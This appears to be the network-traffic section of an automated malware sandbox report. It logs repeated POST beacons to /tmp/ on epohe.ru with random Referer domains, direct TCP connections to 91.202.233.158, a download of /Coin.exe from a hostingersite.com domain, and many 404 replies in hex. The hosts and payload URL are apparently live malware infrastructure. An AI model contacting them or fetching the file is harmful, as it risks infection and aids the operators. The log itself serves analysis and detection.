Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://asfcixluuutwn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jlbunmblotwunq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vfaiilfonqsqudx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qjqwiddoadvtn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: epohe.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	TCP traffic detected without corresponding DNS query: 91.202.233.158
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: epohe.ru
Source: global traffic	DNS traffic detected: DNS query: www.darkviolet-alpaca-923878.hostingersite.com

Source: unknown

HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynvnjwpyrjjaik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: epohe.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 